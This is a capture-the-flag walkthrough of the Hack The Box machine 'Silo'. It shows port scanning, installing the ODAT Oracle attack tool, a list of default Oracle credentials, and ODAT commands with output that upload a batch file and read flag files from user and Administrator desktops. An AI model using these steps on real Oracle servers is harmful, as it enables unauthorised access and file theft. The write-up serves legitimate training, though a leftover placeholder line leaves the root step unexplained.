Silo is a Medium windows box released back in March 2018.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Silo]
→ nmap -F 10.10.10.82
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 10:50 GMT
Nmap scan report for 10.10.10.82
Host is up (0.098s latency).
Not shown: 92 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.65 seconds
λ nihilist [ 10.10.14.10/23 ] [~/_HTB]
→ nmap -sCV -p80,135,139,445 10.10.10.82
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 10:51 GMT
Nmap scan report for 10.10.10.82
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1m22s, deviation: 0s, median: 1m21s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-16T10:52:49
|_ start_date: 2020-03-16T10:51:55
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.03 seconds
Our nmap scan picked up port 80 so let's investigate it:
So we are greeted by a default Windows Server IIS webpage, so we could use dirsearch on it but it won't give us much results that we can use. So we'll move onto the next ports: 135,139 & 445 which are giving an oracle database for us to work with, onto which we'll use the ODat tool. So first let's install it :
λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Silo]
→ git clone https://github.com/quentinhardy/odat
Cloning into 'odat'...
remote: Enumerating objects: 180, done.
remote: Counting objects: 100% (180/180), done.
remote: Compressing objects: 100% (122/122), done.
remote: Total 900 (delta 97), reused 112 (delta 58), pack-reused 720
Receiving objects: 100% (900/900), 934.49 KiB | 1.77 MiB/s, done.
Resolving deltas: 100% (531/531), done.
λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Silo]
→ cd odat
λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
→ git submodule init [c47824b]
Submodule 'docs' (https://github.com/quentinhardy/odat.wiki.git) registered for path 'docs'
λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
→ git submodule update [c47824b]
Cloning into '/home/nihilist/_HTB/Silo/odat/docs'...
Submodule path 'docs': checked out '402d0446a807f8c75e07addaf0887a82c739bf1f'
λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
→ sudo apt install libaio1 python3-dev alien python3-pip
Once the dependencies installed, we download the rpm file from the oracle website
λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
→ wget https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm
--2020-03-16 12:51:55-- https://download.oracle.com/otn_software/linux/instantclient/19600/oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 23.212.224.6
Connecting to download.oracle.com (download.oracle.com)|23.212.224.6|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27978612 (27M) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm’
oracle-instantclien 100%[===================>] 26.68M 2.38MB/s in 11s
2020-03-16 12:52:08 (2.34 MB/s) - ‘oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm’ saved [27978612/27978612]
λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ✔
→ sudo alien --to-deb oracle-instantclient19.6-basiclite-19.6.0.0.0-1.x86_64.rpm
Warning: Skipping conversion of scripts in package oracle-instantclient19.6-basiclite: postinst postrm
Warning: Use the --scripts parameter to include the scripts.
oracle-instantclient19.6-basiclite_19.6.0.0.0-2_amd64.deb generated
λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 ?
→ sudo dpkg -i oracle-instantclient19.6-basiclite_19.6.0.0.0-2_amd64.deb
Selecting previously unselected package oracle-instantclient19.6-basiclite.
(Reading database ... 572297 files and directories currently installed.)
Preparing to unpack oracle-instantclient19.6-basiclite_19.6.0.0.0-2_amd64.deb ...
Unpacking oracle-instantclient19.6-basiclite (19.6.0.0.0-2) ...
Setting up oracle-instantclient19.6-basiclite (19.6.0.0.0-2) ...
Processing triggers for libc-bin (2.29-10) ...
Now that we have installed it, we edit our /etc/profle to define the Oracle env variables:
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=$ORACLE_HOME/bin:$PATH
Next step is creating /etc/ld.so.conf.d/oracle.conf and adding the path to Oracle Home:
λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
→ sudo nano /etc/ld.so.conf.d/oracle.conf
Adding the path to the Oracle Home directory:
/usr/lib/oracle/19.6/client64/lib/
Next we update the ldpath:
λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
→ sudo ldconfig
And finally we pip3 install cx_oracle and by testing it we see that we didn't have any problems so far:
λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
→ sudo -s [c47824b]
Starting ssh-agent...
Identity added: /root/.ssh/id_rsa (root@prometheus)
Identity added: /root/.ssh/id_ed25519 (root@prometheus)
λ root [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
→ source /etc/profile [c47824b]
# pip3 install cx_Oracle [c47824b]
Collecting cx_Oracle
Downloading https://files.pythonhosted.org/packages/c9/ba/0fb63d616c2856016c13615ac43209b1909b7dbd8c5c461a79922e276678/cx_Oracle-7.3.0-cp37-cp37m-manylinux1_x86_64.whl (742kB)
100% |████████████████████████████████| 747kB 744kB/s
Installing collected packages: cx-Oracle
Successfully installed cx-Oracle-7.3.0
# python3 -c 'import cx_Oracle' [c47824b]
#
Next up we install the remaining dependencies we need :
λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
→ sudo apt install python3-scapy [c47824b]
Reading package lists... Done
Building dependency tree
Reading state information... Done
python3-scapy is already the newest version (2.4.3-3).
python3-scapy set to manually installed.
The following packages were automatically installed and are no longer required:
b43-fwcutter chromium-common chromium-sandbox firmware-b43-installer firmware-b43legacy-installer
gnome-brave-icon-theme gnome-colors-common libdns-export1107 libdns1107 libexiv2-14 libicu57 libisc-export1104
libisc1104 libjs-jquery-easing libjs-jquery-fancybox libjs-jquery-mousewheel libmicrodns0 libmysofa0 libradare2-3.9
libu2f-udev python-apt python-asn1crypto python3-pycountry python3-simplegeneric ruby-diff-lcs ruby-docile
ruby-rspec-expectations ruby-rspec-support ruby-simplecov ruby-simplecov-html system-config-printer
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 123 not upgraded.
λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
→ sudo pip3 install colorlog termcolor pycrypto passlib [c47824b]
Collecting colorlog
Downloading https://files.pythonhosted.org/packages/00/0d/22c73c2eccb21dd3498df7d22c0b1d4a30f5a5fb3feb64e1ce06bc247747/colorlog-4.1.0-py2.py3-none-any.whl
Requirement already satisfied: termcolor in /usr/lib/python3/dist-packages (1.1.0)
Requirement already satisfied: pycrypto in /usr/lib/python3/dist-packages (2.6.1)
Requirement already satisfied: passlib in /usr/lib/python3/dist-packages (1.7.2)
Installing collected packages: colorlog
Successfully installed colorlog-4.1.0
λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
→ sudo pip3 install argcomplete && sudo activate-global-python-argcomplete [c47824b]
Requirement already satisfied: argcomplete in /usr/lib/python3/dist-packages (1.8.1)
Installing bash completion script /etc/bash_completion.d/python-argcomplete.sh
From there we need to install the development version of pyinstaller (http://www.pyinstaller.org/) for python3.
λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
→ pip3 install pyinstaller [c47824b]
Collecting pyinstaller
Downloading https://files.pythonhosted.org/packages/3c/c9/c3f9bc64eb11eee6a824686deba6129884c8cbdf70e750661773b9865ee0/PyInstaller-3.6.tar.gz (3.5MB)
100% |████████████████████████████████| 3.5MB 206kB/s
Installing build dependencies ... done
Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from pyinstaller) (44.0.0)
Collecting altgraph (from pyinstaller)
Downloading https://files.pythonhosted.org/packages/ee/3d/bfca21174b162f6ce674953f1b7a640c1498357fa6184776029557c25399/altgraph-0.17-py2.py3-none-any.whl
Building wheels for collected packages: pyinstaller
Running setup.py bdist_wheel for pyinstaller ... done
Stored in directory: /home/nihilist/.cache/pip/wheels/62/fe/62/4c0f196d1e0dd689e097449bc81d7d585a7de7dd86b081b80b
Successfully built pyinstaller
Installing collected packages: altgraph, pyinstaller
The scripts pyi-archive_viewer, pyi-bindepend, pyi-grab_version, pyi-makespec, pyi-set_version and pyinstaller are installed in '/home/nihilist/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed altgraph-0.17 pyinstaller-3.6
λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
→ ./odat.py -h [c47824b]
ERROT: Python 3 has to be used for this version of ODAT
λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
→ python3 odat.py -h
AND FINALLY we are able to use the Oracle Database Attacking Tool odat.py:
λ nihilist [ 10.10.14.10 ] [_HTB/Silo/odat] at master-python3 ?
→ python3 odat.py -h [c47824b]
odat.py:52: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
usage: odat.py [-h] [--version]
{all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
...
_ __ _ ___
/ \| \ / \|_ _|
( o ) o ) o || |
\_/|__/|_n_||_|
-------------------------------------------
_ __ _ ___
/ \ | \ / \ |_ _|
( o ) o ) o | | |
\_/racle |__/atabase |_n_|ttacking |_|ool
-------------------------------------------
By Quentin Hardy (quentin.hardy@protonmail.com or quentin.hardy@bt.com)
positional arguments:
{all,tnscmd,tnspoison,sidguesser,passwordguesser,utlhttp,httpuritype,utltcp,ctxsys,externaltable,dbmsxslprocessor,dbmsadvisor,utlfile,dbmsscheduler,java,passwordstealer,oradbg,dbmslob,stealremotepwds,userlikepwd,smb,privesc,cve,search,unwrapper,clean}
Choose a main command
all to run all modules in order to know what it is possible to do
tnscmd to communicate with the TNS listener
tnspoison to exploit TNS poisoning attack
sidguesser to know valid SIDs
passwordguesser to know valid credentials
utlhttp to send HTTP requests or to scan ports
httpuritype to send HTTP requests or to scan ports
utltcp to scan ports
ctxsys to read files
externaltable to read files or to execute system commands/scripts
dbmsxslprocessor to upload files
dbmsadvisor to upload files
utlfile to download/upload/delete files
dbmsscheduler to execute system commands without a standard output
java to execute system commands
passwordstealer to get hashed Oracle passwords
oradbg to execute a bin or script
dbmslob to download files
stealremotepwds to steal hashed passwords thanks an authentication sniffing (CVE-2012-3137)
userlikepwd to try each Oracle username stored in the DB like the corresponding pwd
smb to capture the SMB authentication
privesc to gain elevated access
cve to exploit a CVE
search to search in databases, tables and columns
unwrapper to unwrap PL/SQL source code (no for 9i version)
clean clean traces and logs
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit
Let's keep in mind that Oracle databases have a few possible default credentials :
SYSTEM:MANAGER
SCOTT:TIGER
SYS:CHANGE_ON_INSTALL
OUTLN:OUTLN
DBSNMP:DBSNMP
CTXSYS:CTXSYS
MDSYS:MDSYS
so we try them manually one by one, until we find that scott:tiger are the correct credentials: Although they may be the correct credentials, we do not know what is the user on the box, so we create a .bat script to be able to list the directories in C:\Users\ :
λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
→ echo 'dir /a c:\Users\' > nihilist.bat
We upload it using odat.py's dbmsxslprocessor :
λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
→ python3 odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:/" nihilist.bat /home/nihilist/_HTB/Silo/odat/nihilist.bat --sysdba
[1] (10.10.10.82:1521): Put the /home/nihilist/_HTB/Silo/odat/nihilist.bat local file in the c:/ path (named nihilist.bat) of the 10.10.10.82 server
[+] The /home/nihilist/_HTB/Silo/odat/nihilist.bat local file was put in the remote c:/ path (named nihilist.bat)
Now we use it to list the user directories :
λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
→ python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --exec "dir C:/" nihilist.bat --sysdba
And looking at the results, we get the username "Phineas" so we grab his user flag:
λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
→ python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Phineas/Desktop" "user.txt" "spz.io" --sysdba
[1] (10.10.10.82:1521): Read the user.txt file stored in the c:/Users/Phineas/Desktop path
[+] Data stored in the remote file user.txt stored in c:/Users/Phineas/Desktop
92XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we have the user flag !
the text goes here
λ nihilist [ 10.10.14.10/23 ] [_HTB/Silo/odat] at master-python3 !?
→ sudo python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Administrator/Desktop" "root.txt" "spz.io" --sysdba
[1] (10.10.10.82:1521): Read the root.txt file stored in the c:/Users/Administrator/Desktop path
[+] Data stored in the remote file root.txt stored in c:/Users/Administrator/Desktop
cdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we have the root flag !
Here we can see the progress graph :
Until there is Nothing left.
Donate XMR: 8AUYjhQeG3D5aodJDtqG499N5jXXM71gYKD8LgSsFB9BUV1o7muLv3DXHoydRTK4SZaaUBq4EAUqpZHLrX2VZLH71Jrd9k8
Contact: nihilist@contact.nowhere.moe (PGP)